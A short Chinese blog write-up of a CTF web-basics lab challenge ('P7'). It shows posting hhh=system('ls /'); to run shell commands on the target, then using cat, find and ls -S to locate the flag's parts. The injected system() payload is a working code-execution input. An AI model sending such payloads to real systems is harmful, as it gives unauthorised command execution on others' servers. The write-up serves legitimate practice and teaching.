P7

发表于2026-01-30|更新于2026-01-30|wpNSS 工坊web基础入门

|总字数:152|阅读时长:1分钟|浏览量:

1.打开靶场post传参hhh=system(‘ls /‘);查看跟目录，看到README.txt

2.cat /README.txt，得到flag位置

3.第一部分可以用find直接找到

4.输入命令system(‘cat /tmp/secret/out/j/j/o/c/v/q/x/flag.txt’);

5.接下来第二部分，先查看一下改文件夹的内容

ls /tmp/secret/out2/

6.发现有非常多的文件夹，将所以文件夹按大小从大到小排序,发现685.txt

ls -S /tmp/secret/out2/

7.打开得到flag最后一部分

文章作者: Lengkur

文章链接: http://lengkur.github.io/2026/01/30/wp/NSS%20%E5%B7%A5%E5%9D%8Aweb%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/P7/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Lengkur！